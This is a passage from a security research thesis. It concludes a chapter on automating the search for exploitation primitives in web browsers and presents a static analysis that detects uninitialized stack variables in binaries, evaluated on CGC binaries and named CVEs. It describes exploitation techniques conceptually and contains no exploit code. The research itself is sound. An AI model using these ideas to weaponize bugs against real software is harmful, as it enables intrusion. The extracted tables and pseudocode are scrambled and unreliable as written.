The urge for building automated binary analysis systems that operate at scale and efficacy is undeniable. One of the big open limitations is practicality on large, complex applications. Fuzzing has become an attractive and valuable instrument to pinpoint bugs in large binaries and is gaining more and more attention in research [22, 23, 175]. Again, we stress that the intention of our prototype at this point is not to find bugs, but to automate the exploitation step that starts from an attacker-influenced point induced by a vulnerability. Many bug classes are too complex to be exploited in a generic manner; a human expert is still required. In all evaluated case studies, the heap layout plays a key role which might have a non-deterministic behavior. For CVE-2014-0322, PrimGen needs to know how a user controlled buffer interplays with the heaps buffer in order to succeed. Heap spray routines that can be templated and passed to our system need the attacker’s knowledge on how the offsets overlap with the native context. These are interesting and challenging problems that we attempt to approach in the future. 4. Towards Automated Generation of Expl. Primitives for Web Browsers 107

We argue that supporting and guiding a human expert [126, 183] through the process of exploit development in an automated manner is an important step towards automated exploitation of complex vulnerabilities, as they can be found in web browsers. We cannot rule out with failure runs of PrimGen that there is no way to drive execution into an exploitable state. However, complete failure runs indicate a more complex and difficult situation driven through the given VUT, which might not be worth the effort. Note that we do not generate fully weaponized exploits, but extend the attacker’s control towards a successful exploit. However, full exploits we observed are dependent on the procedures which PrimGen provides automatically.

4.5 Related Work

The problem of automated exploit generation has been tackled by research in the recent past. In this section, we discuss work closely related to ours. Brumley et al. [29] proposed a method for automatic patch-based exploit generation (APEG), a problem that was previously addressed in a manual way. APEG uses the patched binary to identify vulnerability points and indicates the conditions under which it can exploit the unpatched binary. The authors use a dynamic approach with static analysis by utilizing known inputs that drive the execution close to their target spot and use static slicing to close the gap. We believe that this might integrate well within our path generation procedure by using the dump at the control point. AEG [12] extended this approach and tackled the problems of finding exploitable bugs and automatically generating exploits for mainly stack-based overflows and format-string vulnerabilities. AEG works solely on source code and introduces preconditioned symbolic execution as a technique to manage the state explosion problem. Mayhem [39] again extended AEG to binary code. The system analyzes the binary by performing path exploration until a vulnerable state is reached. It introduced a hybrid symbolic execution approach that alternates between online and offline (concolic) modes of symbolic execution, once a memory cap is reached. Mayhem uses several path prioritization heuristics to drive the execution towards paths that most likely contain bugs. Heelan [98] proposed a technique for exploit generation that requires two parameters: a crashing input and shellcode. The crashing input is used on instrumented code to pinpoint and identify a potential vulnerability. Dynamic taint analysis is used to find suitable buffers where the shellcode might fit in. Once the exploit type is determined, the system generates formula constraining the suitable 108 4.6. Conclusion memory area to the value of shellcode. This formula is combined with a formula to build IP (instruction pointer) control to calculate the path conditions. At the end of the analysis, a final formula expresses the conditions of the exploit. An extension to the problem of finding suitable shellcode buffers was examined by Bao et al. [17]. In particular, the authors tackle the shellcode transplant problem. They present ShellSwap, a tool that modifies the original exploit of a vulnerable program to cope with a new shellcode that carries out different actions desired by the attacker. In many ways, binary analysis can be seen as a search space problem. Recent research has thoroughly explored different strategies to cope with state explosion by minimizing the search space leading to most promising or interesting areas in the codebase. A recent work by Trabish et al. [199] tackles this problem in a new way. The authors propose Chopped Symbolic Execution, a technique that leverages several on-demand static analyses to determine code fragments which can be excluded. These fragments also involve functions that do not touch dependent data and therefore are candidates to be skipped. We follow a similar intention by our ahead-of-time path generation procedure that skips functions not related to any controlled data. Frameworks like Mayhem or AEG that tackle a fully automatic generation of exploits are limited to simpler bug classes [182]. However, they set an important stage for future research on more complex cases. This is the stage we aim to tackle with PrimGen by driving research towards more complex scenarios as they can be found in web browsers.

4.6 Conclusion

In this chapter, we demonstrated how to automate a crucial part of the exploitation process: locating reachable exploitation primitives in complex binary code such as modern browsers. In practice, searching and finding such a primitive, analyzing the corresponding program paths, and crafting the fields correctly is a cumbersome and manual task. We demonstrated how all these steps can be automated based on a combination of static and dynamic binary analysis techniques. Based on a vulnerability testcase (VUT), our prototype implementation called PrimGen successfully generates new and previously unknown opportunities that drive the execution into exploitable states in different web browsers. We view this as an important step towards automated exploit generation for modern, complex software systems. 5 Static Detection of Uninitialized Stack Variables in Binary Code

Contents

5.1 Uninitialized Stack Variables ...... 111 5.2 Design and Approach ...... 113 5.2.1 Safe Zones ...... 114 5.2.2 Interprocedural Flow Analysis ...... 116 5.2.3 Symbolic Execution ...... 118 5.2.4 Implementation ...... 119 5.3 Evaluation ...... 119 5.3.1 CGC Test Corpus ...... 119 5.3.2 Real-World Binaries ...... 120 5.4 Discussion ...... 121 5.5 Related Work ...... 124 5.6 Conclusion ...... 126

Memory corruption vulnerabilities are prevalent in programs developed in type- unsafe languages such as C and C++. These types of software faults are known since many years and discovering memory corruption bugs in binary executables has received a lot of attention for decades. Nevertheless, it is still an open research problem to efficiently detect vulnerabilities in binary code in an automated and scalable fashion. Especially temporal bugs seem to be a common problem in complex programs, an observation that the steady stream of reported vulnerabilities confirms [61, 60, 59, 193]. In practice, especially web browsers are often affected by temporal bugs and these programs suffer from use-after-free vulnerabilities,

109 110 5. Static Detection of Uninitialized Stack Variables in Binary Code race conditions, uninitialized memory corruptions, and similar kinds of software vulnerabilities. One specific challenge is the efficient detection of uninitialized memory errors, such as uninitialized stack variables. While such vulnerabilities got into the focus of several real-world attacks [57, 58, 61, 56, 32, 96], they still represent an attack vector that is not studied well and often overlooked in practice. The basic principle of such vulnerabilities is straightforward: if a variable is declared but not defined (i.e., not initialized properly) and used later on in a given program, then an attacker may abuse such a software fault as an attack primitive. The uninitialized variable may for example contain left-over information from prior variables in stale stack frames used during prior function calls. This information can be used to disclose memory and leak sensitive information, which can then be used by an attacker to bypass Address Space Layout Randomization (ASLR) or other defenses. In the worst case, an attacker can control the content of an uninitialized variable and use it to execute arbitrary code of her choice, hence fully compromising the program. Uninitialized memory errors represent a vulnerability class that often affects complex, real-world programs: for example, at the 2016 edition of the annual pwn2own contest, Microsoft’s Edge web browser fell victim to an uninitialized stack variable [32]. As a result, this vulnerability was enough to exploit the memory corruption vulnerability and gain full control over the whole program. Similarly, an uninitialized structure on the stack was used in the pwn2own contest 2017 to perform a guest-to-host privilege escalation in VMware [96]. The detection of uninitialized variables in an automated way has been studied for software whose source code is available[114, 73, 103]. The urge for such systems, especially targeting the stack, is also addressed by recent research through tools like SafeInit [145] or UniSan[134]. These systems set their main focus on prevention and also rely on source code. In practice, however, a lot of popular software is unfortunately proprietary and only available in binary format. Hence, if source code is unavailable, we need to resort to binary analysis. The analysis of binary code, on the other hand, is much more challenging since some of the context information gets lost during the compilation phase. The loss of data and context information (e.g, names, types, and structures of data are no longer available) hampers analysis and their reconstruction is difficult [185, 110, 94]. Thus, the development of precise analysis methods is more complicated without this information. Addressing this issue, we are compelled to consider every statement in the assembly code as it might relate to uninitialized memory of stack variables. 5. Static Detection of Uninitialized Stack Variables in Binary Code 111

In this chapter, we address this challenge and propose an automated analysis system to statically detect uninitialized stack variables in binary code. Since dynamic analysis methods typically lack comprehensive coverage of all possible paths, we introduce a novel static analysis approach which provides full coverage, at the cost of potentially unsound results (i.e., potential false positive and false negatives). However, unveiling potential spots of uninitialized reads and covering the whole binary poses a more attractive trade-off given the high value of detecting novel vulnerabilities. Note that the information obtained by our approach can further serve in a dynamic approach, e.g., to automatically verify each warning generated by our method. Our analysis is performed in two phases: A preprocessing phase that lifts binary software to an intermediate language, instruments it, and transforms it into an IR for further processing in a postprocessing phase. We designed a framework that builds on top of Mentalese which, by design, follows this pattern. It lifts binary software into SymIL which is further transformed into an IR in form of a knowledgebase that serves our Datalog programs. The declarative logic approach with Datalog as presented in Chapter 3 enables us to efficiently query the IR that contains facts about the binary code. We use the pointer analysis of Mentalese to gain explicit information on indirect writes and reads that are connected to passed pointers. This allows us to track the indirect read or write back to the specific calling context where the points-to information is further propagated and incorporated in the IR. This analysis step builds up the conceptual structure on which our dataflow algorithms operate to detect uninitialized variables.

To demonstrate the practical feasibility of the proposed method, we implemented a prototype which is tailored to detect uninitialized stack variables. Our results show that we can successfully find all uninitialized stack vulnerabilities in the Cyber Grand Challenge (CGC) binaries. In addition, we detected several real-world vulnerabilities in complex software such as web browsers and OS kernel binaries. Finally, our prototype is able to detect and pinpoint new and previously unknown bugs as we demonstrate in this chapter.

5.1 Uninitialized Stack Variables

Stack variables are local variables stored in the stack frame of a given function. A function usually allocates a new stack frame during its prologue by decreasing the stack pointer and setting up a new frame pointer that points to the beginning of 112 5.1. Uninitialized Stack Variables

entry: f1 entry: f1 entry: f2(arg)

∗ ∗ x: call f2(&var1) w: def(∗arg) k: x: defvar1 y:

y: usevar 1 exit: z: usevar1

Figure 5.1: Uninitialized use of a stack variable: On the left side the intraprocedural case, on the right side the interprocedural. the frame. Depending on the calling convention, either the caller or callee frees the stack frame by increasing the stack pointer and restoring the old frame pointer. For example, in the stdcall calling convention, the callee is responsible for cleaning up the stack during the epilogue. It is important to note that data from deallocated stack frames are not automatically overwritten during a function’s prologue or epilogue. This, in particular, means that old (and thus stale) data can still be present in a newly allocated stack frame. A stack variable that is not initialized properly hence contains old data from earlier, deallocated stack frames. Such a variable is also called uninitialized. An uninitialized stack variable can lead to undefined behavior, not at least due to its unpleasant property that the program does not necessarily crash upon such inputs. In practice, uninitialized variables can be exploited in various ways and pose a serious problem [57, 58, 61, 56, 32, 135]. They usually contain junk data, but if an attacker can control these memory cells with data of her choice, the software vulnerability might enable arbitrary code execution. To tackle this problem, the compiler can report uninitialized stack variables at compile time for intraprocedural cases. Unfortunately, interprocedural cases are usually not taken into account by compilers. This lies in the nature of compilers which need to be fast and cannot afford costly analysis procedures. Even for optimization purposes, past research reveals that the benefits of extensive interpro- cedural analyses are not large enough to be taken account of in compilers [171].

Figure 5.1 shows a simple example for both cases. On the left-hand side, the intraprocedural case is shown: There are two possible paths inside function f1 which start at x and end in z. Variable var1 is initialized at x, and used at z. Following ∗ the path (entry → y, z), however, var1 is still uninitialized.

In the interprocedural case on the right side, there are two functions f1 and f2. The dotted lines indicate interprocedural edges. In f1, a pointer to var1 is 5. Static Detection of Uninitialized Stack Variables in Binary Code 113

passed as an argument to f2. The variable var1 is initialized indirectly over the

passed pointer at w in f2. Back in f1 at y, var1 is used. By traversing the path

(entryf1 , x, entryf2 , k, exit, x, y), we encounter an uninitialized use of var1 at y. While the uninitialized use on the left-hand side is reported by compilers, the example on the right-hand side is not.

5.2 Design and Approach

Our analysis builds on top of Mentalese and is divided into two processing phases. The stages are set up in the same pattern as presented in Section 4.2. The pre-processing stage complies to the operations performed by the frontend of Mentalese: The binary is lifted into SymIL and transformed into Mental-IR. The IR keeps the SSA nature of SymIL and exposes details about the binary that are summarized in Table 3.1. Based on this IR, we then perform an interprocedural pointer analysis (see Section 3.4.2) to reconstruct information about indirect definitions and uses of stack locations. We use the reconstructed information to determine safe zones for each stack access. These zones consist of safe basic blocks, i.e., a use in these blocks with respect to the specific variable is covered by a definition on all paths. Stack accesses outside their corresponding safe zone produce warnings. For each variable, we determine a safe zone in its corresponding function context. Our dataflow algorithms propagate information about safe zones from callers to callees and vice versa. If a path exists from the entry of a function to the use of a variable, which avoids the basic blocks of its safe zone, then the stack access is flagged unsafe. If a potentially uninitialized parameter is passed to a function, we check if the exit node of the function belongs to its safe zone. This in particular means that each path from the entry point of the function to the leaf node is covered by a definition (i.e., initialization) of the variable. We propagate this information back to the call sites, i.e., the fallthrough basic block at the call site is added to the safe zone of the variable in the context of the caller. This information in turn is further propagated and used at other call sites. Figure 5.2 shows the architecture implemented by our prototype. The Figure adapts to the design of Mentalese as presented in Figure 3.2. By design, Mentalese allows to attach different analyses into the system that work and enrich the same knowledgebase with valuable information. The knowledgebase can be seen as an IR and its specific design implemented by Mentalese to process binaries is called Mental-IR. Whenever new information enters the knowledgebase, either by user input or other analyses attached to 114 5.2. Design and Approach

Monitor

Safe Zones Warnings Analyses

Symbolic Execution Uninitialized Heap Safe Engines Warnings Stack Allocations Zones

Figure 5.2: Architecture implemented by our prototype.

Mentalese. This is shown in Figure 5.2 through the IR contribution cycle. Each analysis can contribute to the IR, extend it, and make the analysis process more precise. All analyses adapt to these changes, as this is the nature of the declarative approach. Each algorithm can transparently help/interact with the other. Warnings and safe zones are outputs of the analysis phase and put into the IR contribution cycle. A monitor observes changes made to safe zones and warnings to either spawn the Datalog algorithms or a symbolic execution engine. The symbolic execution engine tackles the path sensitivity and is fed with safe zones of each stack variable. The aim of the symbolic execution engine is to reach the warning, i.e., a potential uninitialized read, by avoiding the safe zone of that variable. The whole procedure cycles, i.e., each component contributes to the IR which in turn is consumed by other components to adapt. Our current prototype is tailored towards uninitialized stack variables. However, as the plugin system suggests, we are able to enrich the analyses with heap information (see § 5.3.2). In the next sections, we explain the individual analysis steps in detail and present examples to illustrate each step.

5.2.1 Safe Zones

In this section we describe our approach to determine if a given stack read is safe. With safe we refer to the property that a read is covered by its definitions on all paths. Each basic block where a safe read occurs is considered a safe basic block. 5. Static Detection of Uninitialized Stack Variables in Binary Code 115

Since we are dealing with different memory objects, the set of safe basic blocks is different for each object/variable. More formally, we define it as follows.

Definition 9. Let CFG = (V,E) be the control flow graph, S the set of all stack variables, and let Defs = {(spd, fld, bbs) | bbs ∈ V, (spd, fld) ∈ S} be the set of all stack accesses that define the stack location (spd, fld) at bbs. bbs is called a safe basic block. Each edge that originates from bbs is called a safe edge with respect to

(spd, fld). Each safe edge is a tuple of the form (spd, fld, bbs, bbt) with (bbs, bbt) ∈ E. The set of all safe basic blocks with respect to (spd, fld) is called the safe zone of (spd, fld).

Apparently, if all incoming edges to a basic block are safe edges with respect to some variable (spd,fld) then that basic block is a safe basic blocks for that variable. To determine safe zones of each variable we proceed as sketched in Algorithm 5.3. An unsafe read occurs if a path exists that avoids the safe zone, i.e., a path from the entry of the function to the use location which does not go through safe edges. Lines 17 − 21 generalize this procedure for all stack accesses. If such a path does not exist, we flag the basic block as safe. In its essence the algorithm does a reaching definition analysis for each stack variable and labels the basic blocks and edges accordingly. The initial process for building safe zones is achieved through lines 7 − 13. From each definition node with respect to the specific stack variable, the information about its definition is propagated further along its path in the control flow graph. Each stack variable is associated with its own safe zone. Note that we do not use memory SSA as it introduces conflicts and complicates the pointer analysis. The reason for this stems from 1) a blow up in number of expressions, 2) at φ-statements we encounter redundancy for memory expressions that alias each other. Hence, we argue that the benefits of SSA in this manner are marginal and not worth the effort.

Example. Figure 5.4 illustrates the labeling of safe edges. Basic blocks 2 and 3 define variables a and b, respectively. Each use of the variable in these basic blocks is considered safe. Accordingly, each use of variable b in {3, 6} is considered safe. At a stack pointer delta of −x an access to variable a is possible. Its field/offset (fld a) is zero. For an access to variable b, fld b is added. The safe zone with respect to (−x, fld a) consists of basic basic blocks {2, 3, 4, 6, 5, 7}. For (−x, fld b) we have {3, 6}. Each use of the variable in these basic blocks is considered safe. 116 5.2. Design and Approach

1: Input: CFG = (V,E), Defs, Uses 2: DOM (dominator sets) 3: Outputs: SafeZone, E (SafeEdges) 4: Let E0 = SafeEdges = {} 5: Let SafeZone = Defs 6: Let Vars = S (spd, fld) (spd,fld,bb) ∈ Defs ∪ Uses 7: for all (spd, fld, bb) ∈ SafeZone do 0 0 8: E = E ∪ {(spd, fld, bb, bbx) | (bb, bbx) ∈ E} 9: for all bbd ∈ DOM(bb) do 0 0 10: E = E ∪ {(spd, fld, bbd, bbx) | (bbd, bbx) ∈ E}

11: SafeZone = SafeZone ∪ {(spd, fld, bbd)} 12: end for 13: end for 14: Let Unsafe = {} 15: for all (spd, fld, bb) ∈ Vars do 16: if ∃p =< bbstart, . . . , bbi, bbj, . . . , bb > with 0 17: (spd, fld, bbi, bbj) ∈/ E , ∀bbi, bbj ∈ p, i =6 j 18: then Unsafe = Unsafe ∪ {(spd, fld, bb)} 19: else SafeZone = SafeZone ∪ {(spd, fld, bb)} 20: end for Figure 5.3: Sketch: Computation of Safe Zones

5.2.2 Interprocedural Flow Analysis

During data flow analysis, we propagate state information that concerns the initialization of passed arguments between caller and callee. Information about pointers is passed back and forth by the pointer analysis. We use this information to determine indirect accesses. If a leaf node in the callee context is flagged safe with respect to a stack access, we flag the corresponding call sites as safe. This procedure propagates information back to the caller, extending the safe zone in the caller context. In turn, Algorithm 5.3 needs another run by using the new information and distinguish between unsafe and safe accesses to the stack. Previously unsafe accesses might turn to safe accesses through this process. This procedure is repeated until it saturates, i.e., no changes to the set of safe basic blocks.

Summaries

A common technique used in interprocedural static analysis is the use of sum- maries [180]. These summaries can be block summaries which gather the effects of a basic block, or function summaries that gather the effects of the whole function 5. Static Detection of Uninitialized Stack Variables in Binary Code 117

Figure 5.4: Graphical representation of labeling safe edges. with respect to the variables of interest. Whenever a function call is encountered, these summaries are utilized and applied. The facts in Datalogs EDB and its deduced facts through rules in the IDB can be seen as such summaries. Whenever a function call is encountered, the analysis uses facts about the function that concern the variables of interest.

Multiple analyses plugins

Mentalese can be extended with new analyses which can basically be plugged in and out. In Figure 5.2 we present two plugins: A Uninitialized Stack plugin and a Heap Allocator plugin that feeds the pointer analysis with information about heap allocators. All plugins operate on the same knowledgebase, each of which deduces and incorporates knowledge extending the mental representation of the binary through the IR, hence, the name Mental-IR. These changes can transparently be tapped by other plugins and library routines, which, for instance, allows the Uninitialized Stack plugin to operate on information deduced by the Heap Allocators plugin. Each plugin can be run in parallel1 and whenever new information enters the cycle to extend the IR, the plugins adapt to it. Each change with respect to warnings and safe zones is monitored.

1This is orchestrated by the Datalog engine of choice. 118 5.2. Design and Approach

Detecting Uninitialized Accesses

When the analysis reaches its fixpoint, all information about safe and unsafe zones with respect to all stack accesses is present. A stack access outside its safe zone causes a warning. Additionally, we track each use to its origin, i.e., in the case of a stack pointer, we track it to the call site where the pointer originates from.

5.2.3 Symbolic Execution

So far we have made a conservative assumption that all paths are executable, which is common practice in simplifying the analysis. To improve precision in this regard we need a mechanism for path-sensitivity in our analysis process. Adapted to our problem, we have to check for each warning if a satisfiable path exists to the use of the variable by avoiding its safe zone. To tackle path sensitivity, we utilize under-constrained symbolic execution [163]. Under-constrained symbolic execution immensely improves the scalability by checking each function directly, rather than the whole program. Due to the lack of context before the call of the function under analysis some register/memory values are unconstrained, hence the under-constrained term. For each variable that caused a warning, we feed the symbolic execution engine with information about its safe zones. Satisfiability is checked from each function where the stack variable originates from to the flagged variable by avoiding the basic blocks of its safe zone. To improve the scalability of the symbolic execution, we initially skip each function call that does not lead us to the target, i.e., the function to skip is not in the call chain to reaching the target function. For instance, if a function f0 needs to reach the target in a function f2 over a function f1 then the call chain is f0, f1, f2. However, in f1 we might have functions that are called prior to the f2 call which are the functions we initially skip. If a path is satisfiable then we might have an overapproximation, since some skipped function might have made a constraint become unsatisfiable. For unsatis- fiable paths, we look at the unsat-core, i.e. those constraints which have caused the path become unsatisfiable. A function that alters one of these variables in those constraints is then set free to be processed by the engine; again in a similar fashion by first skipping calls in the new function context until we eventually reach a satisfiable state. The only difference is that we now force the engine to run into basic blocks that modify the variables that made our constraints become unsatisfiable. As a result, we basically overapproximate the set of satisfiable paths. Filtered warnings are removed as such from the Mental-IR. 5. Static Detection of Uninitialized Stack Variables in Binary Code 119

5.2.4 Implementation

The implementation is similar to what we have presented in the previous chapter. Our prototype is implemented on top of Mentalese: We retrieve the control-flow graph from IDA Pro, transform it into a JSON and feed it into Mentalese. The choice for IDA PRO is a decision made by convenience: It is a a golden standard in the field of disassemblers, and has been shown to be the most accurate[9], although ,by now, the field is now enriched with competitive tools like Binary Ninja and Ghidra. Basically any of these disassemblers have an API to extract the CFG in a format that Mentalese can process. We built the symbolic execution on top of Angr [182], a platform agnostic binary analysis framework. As Figure 5.2 indicates, we plan to attach more engines to our framework. This is motivated by the fact that each engine comes with advantages and its shortcomings, which we hope to compensate by combining different engines. It also seems natural to plug in fuzzers into this process.

5.3 Evaluation

In this section, we evaluate the prototype implementation of our analysis framework and discuss empirical results. Note that the analysis framework is by design OS inde- pendent. Our analyses were performed on a machine running with Intel Xeon CPUs [email protected] and 128GB RAM. The programs presented in Table 5.1 and Table 5.2 are compiled for x86-64. Our prototype is not limited to 64 bit, but also supports 32 bit binaries.

5.3.1 CGC Test Corpus

As a first step to obtain a measurement on how our approach copes with realistic, real-world scenarios, we evaluated our prototype over a set of Cyber Grand Challenge (CGC) binaries which, in particular, contain a known uninitialized stack vulnerability. These CGC binaries are built to imitate real-world exploit scenarios and deliver enough complexity to stress out automated analysis frameworks. Patches of the vulnerabilities ease the effort to find the states of true positives and hence these binaries can serve as a ground truth for our evaluation. We picked those binaries from the whole CGC corpus that are documented to contain an uninitialized use of a stack variable as an exploit primitive and we evaluate our prototype with these eight binaries. Table 5.1 shows our results for this CGC test setup. The third column of the table depicts the number of facts extracted from the binary building up the EDB. 120 5.3. Evaluation

The fourth column shows the number of deduced pointer facts. The fifth column depicts the total number of stack accesses. The sixth column denotes the number of potential uninitialized stack variables grouped by their stack pointer delta value and their origin. This approach is similar to fuzzy stack hashing as proposed by Molnar et al. [146] to group together instances of the same bug. For each of the eight binaries, we successfully detected the vulnerability. Each detected use of an uninitialized stack variable is registered, among which some might stem from the same origin. Therefore, we group those warnings by the stack pointer delta values of those stack variables from which they originate. The individual columns of Table 5.1 depict this process in numbers. We double-checked our results with the patched binaries to validate that our analysis process does not produce erroneous warnings for patched cases. For each patched binary, our analysis does not generate a warning for the vulnerabilities anymore.

5.3.2 Real-World Binaries

Beyond the synthetic CGC test cases, we also applied our analysis framework on real-world binaries. Table 5.2 summarizes our results for binutils, gnuplot, and ImageMagick. The numbers are similar to what we have seen for the CGC test cases. The values in parentheses are manually verified bugs. Note that the number of warnings pinpointing the root cause and the potential flaw through an uninitialized variable is comparatively small to the number of all accesses. For ImageMagick, for instance, our prototype reported 168 stack accesses out of 150k among which two of them are bugs. Additionally, our symbolic execution filter was able to reduce the warning rate by a factor of eight in our experiments. Some user space programs use a variation of malloc for allocating memory dynamically. Performance-critical applications like browsers even come with their own custom memory allocators. To enable tracking of dynamic memory objects, we use a list of known memory allocators enriching the IR with pointer information. This is exposed by the Heap-Allocator plugin (see Section 5.2.2) The pointer analysis grabs this information and deduces new facts. This enables us to observe a coherence between stack locations and heap. While this is an experimental feature of our prototype, it has proven itself valuable by pinpointing three uninitialized bugs in gprof and objdump. Despite the false positive rates which we discuss in the next sections, we strongly believe that the output of our prototype is a valuable asset for an analyst and the time spent to investigate is worth the effort. The numbers are given in column 6 of Table 5.2. Overall, we found two recently reported vulnerabilities in ImageMagick, 5. Static Detection of Uninitialized Stack Variables in Binary Code 121

two previously unknown bugs in objdump, one unknown bug in gprof, and two bugs in gnuplot. A manual analysis revealed that the bugs in objdump and gprof are not security critical. The two bugs in gnuplot were fixed with the latest patchlevel at the time of writing. Our analysis can also cope with complex programs such as web browsers, interpreters and even OS kernels in a platform-agnostic manner. We tested our framework on MSHTML (Internet Explorer 8, CVE-2011-1346), Samba (CVE-2015- 0240), ntoskrnl.exe (Windows kernel, CVE-2016-0040), PHP (CVE-2016-7480), and Chakra (Microsoft Edge, CVE-2016-0191). In each case, we successfully detected the vulnerability in accordance to the CVE case.

5.4 Discussion

The discovery of vulnerabilities for both the CGC binaries and real-world binaries demonstrates that our approach can successfully detect and pinpoint various kinds of uninitialized memory vulnerabilities. Our analysis is tailored to stack variables, with a design that is well-aligned with the intended purpose of a bug-detecting static analysis. However, it also comes with some limitations that are not currently tackled by our prototype and we discuss potential drawbacks of our approach in the following.

Heap

It is well known that analyzing the data flow on the heap is harder than data flow on the stack and in registers. To address this problem, for example Rinetzky and Sagiv proposed an approach to infer shape predicates for heap objects [172]. More recently, the topic of separation logic has gained more attention as a general purpose shape analysis tool [170]. This is—among other reasons—due to the fact that aliasing analysis becomes much more difficult for real-world code that makes use of the heap as compared to the data flow that arises from stack usage. We account for all stack accesses under the reconstructed CFG. Hence, a stack variable which is initialized through a heap variable is supported by our approach. A points-to analysis needs to account for this interplay. Therefore, we implemented a component that adapts to the given set of points-to facts and tracks heap pointers originating from known heap allocators (see § 5.3.2). This procedure is by design not sound, however the discovered bugs which originated from the heap were found by using this approach. Many performance-critical applications like browsers have their own custom memory allocators which poses a problem to address. However, there is work on this field with promising results as shown in recent research done by Chen et al. [42, 43]. 122 5.4. Discussion 9k 15k 29 5k 543 4 19k16k16k15k16k15k 23k15k 19k 20k31k 18k 22k 19k 19k 42 (2) 24 150k 34 (1) 22 15 11 20 168 (2) 12k 23k 54 (2) > > > > > > > > > > > 4M 24M 107k 3.2M 2.9M 3.8M 3.1M 3.8M 3.5M 3.1M 7.2M > > > > > > > > > > > Analysis results for the relevant CGC binaries that contain an uninitialized memory vulnerability. Table 5.1: Analysis results for binutils-2.30, ImageMagick-6.0.8, gnuplot 5.2 patchlevel 4. Number in parentheses denotes the number of ar 2.4k size 1.9k gprof 2.3k cxxfilt 2.2k SSO 64 26k 204 650 4 ld-new 2.8k strings 2.2k readelf 115 as-new 2.2k MCS 122 156k 860 2498 11 Accel 185 109k 2179 2057 33 gnuplot 3k Binary Functions Facts Pointer Facts Stack Accesses Unique Warnings NOPE 105 57k 568 1378 8 objdump 2.5k Binary Functions Facts Pointer Facts Stack Accesses Unique Warnings TFTTP 58 30k 175 600 3 Hackman 70 46k 545 943 9 BitBlaster 10 4k 42 95 1 Textsearch 90 50k 290 597 2 Image Magick 6.5k verified bugs. Table 5.2: 5. Static Detection of Uninitialized Stack Variables in Binary Code 123

False Positives/False Negatives: A Question of Soundness

Analyzers come with a set of strategies to handle the number of warnings, for instance, by checking the feasibility of paths or don’t report an error at all when there is no guarantee. Each strategy is usually tied to certain aspects of the problem, an approach which we adapted and discussed in the previous sections to tackle false positives. However, we are dealing with many undecidable problems here, i.e., the perfect disassembly and the fact that detection of uninitialized variables itself is undecidable in general. Aggressive compiler optimizations can also pose a burden on the disassembly process as they can facilitate the problem of unpredictable control flow. Even for a state-of-the-art tool like IDA Pro, control-flow analysis is hampered by unpredictability and indirect jumps. Points-to information can resolve some of these indirect jumps [72]. However, even in a flow-insensitive intraprocedural case, a precise analysis is shown to be NP-hard [102], given that no dynamic memory allocation is involved. Programs that contain recursion further restrict the capabilities of static analysis, as shown by Reps [167]. A combination with dynamic approaches might prove itself valuable and information derived by them can enrich our IR improving precision in both directions, dynamic and static. A valuable, yet academically emphasized feature for any analyzer is the question of soundness. For a static analysis with the purpose of a bug prevention tool this usually comes with the property to error on the side of caution, i.e., all violations are caught. A fully sound analysis poses a practical dilemma due to code that we cannot analyze (e.g., libraries which are not modeled or dynamically dispatched code where we might loose sight). Furthermore, a sound analyzer needs a perfect disassembly resulting in a perfect CFG, which is an undecidable problem in general. An analyzer that faces these scenarios needs—in order to be sound—to make conservative descriptions of program behaviors. In the case of indirect calls a conservative description can be to account for all functions; for a library we can describe it as unsafe with respect to some behavior of interest. Such assumptions are not only a burden to scalability but also increase the number of false warnings. For this reason common bug finding tools—as the one presented in this chapter—are neither sound nor complete making trade offs between sound and unsound decisions. A trend that trades full soundness—being partially sound—for scalability, comes with the term soundiness [130]. Systems that follow this description guarantee soundness under a specific context, i.e, part of the code under analysis [137], or a restricted subset of the language semantics. In either case, it means soundness outside of cases that cannot be handled. 124 5.5. Related Work

Another direction that deviates from the traditional concept of static analyzers is soundness from the point of view of dynamic analyzers. Here, soundness means that a reported bug is indeed a true bug. For a static bug finding tool a severe number of false positives is crucial. It seems natural for bug hunting to miss bugs, but have a stronger guarantee that the error is a true positive in the case of a warning. Work that tackles this direction in static analysis, i.e., being sound in a dynamic sense is proposed by Gorogiannis et al. [89].

5.5 Related Work

The development of methods for static analysis spans a wide variety of techniques. Modern compilers like the GNU-Compiler, MSVC, or Clang can report uninitialized variables during compile time. They utilize the underlying compiler framework to implement an intraprocedural analysis to detect potential uninitialized variables. As discussed earlier, compilers are trimmed to run fast, and the analysis time for costly interprocedural algorithms is not desired. For optimization purposes, the benefits of extensive interprocedural analyses might not be desirable to apply [171]. Flake was one of the first to discuss attacks against overlapping data [76], an attack vector closely related to our work on uninitialized memory reads. His presentation focuses on finding paths that have overlapping stack frames with a target (uninitialized) variable. Wang et al. present case studies about undefined behavior [210] among which are induced by the use of uninitialized variables. In a more recent work, Lee et al. introduce several methods to address undefined behavior in the LLVM compiler with a small performance overhead [124]. A popular attempt to tackle the problem of uninitialized memory reads is binary hardening. StackArmor [44] represents a hardening technique that is tailored to protect against stack-based vulnerabilities. To determine functions that might be prone to uninitialized reads, static analysis is used to identify stack locations which cannot proven to be safe. The system can protect against uninitialized reads but cannot detect them. SafeInit [145] extended this idea and represents a hardening technique specifically designed to mitigate uninitialized read vulnerabilities. The authors approach the problem from source code: based on Clang and LLVM, the general idea is to initialize all values on the allocations site of heaps and stacks. In order to keep the overhead low, several strategies are applied to identify suitable spots. They modify the compiler to insert their initialization procedures. By leveraging a multi-variant execution approach, uninitialized reads can be detected. 5. Static Detection of Uninitialized Stack Variables in Binary Code 125

This, however, needs a corpus of proper inputs that can trigger those spots. UniSan [134] represents a similar approach to protect operating system kernels. Based on LLVM, the authors propose a compiler-based approach to eliminate information leaks caused by uninitialized data that utilizes dataflow analysis to trace execution paths that lead to possible leaking spots. UniSan checks for allocations to be fully initialized when they leave the kernel space, and instruments the kernel in order to initialize allocations with zeros, if the check is violated. Another recent approach by Lu et al. [135] targets uninitialized reads in the Linux kernel. They propose techniques for stack spraying to enforce an overlap of the sprayed data with uninitialized memory. With a combination of symbolic execution and fuzzing, they present a deterministic way to find execution paths which prepare data that overlaps with data of a vulnerability. Giuffrida et al.[84] present a monitoring infrastructure to detect different kinds of vulnerabilities, among them uninitialized reads. They perform static analysis at compile time to index program state invariants and identify typed memory objects. The invariants represent safety constraints which are instrumented as metadata into the final binary. Their approach also allows to update and manage metadata dynamically. The proposed framework monitors the application in realtime and checks for invariant violations. Ye et al. propose a static value-flow analysis [215]. They analyze the source and construct a value flow graph which serves to deduce a measure of definedness for variables. The analysis results are used to optimize the instrumentation process of binaries. Other systems which instrument binaries either at compile or execution time to detect uninitialized reads at runtime are proposed in the literature [190, 27]. These systems can be used in combination with a fuzzer or a test suite to detect uninitialized variables. One advantage of these 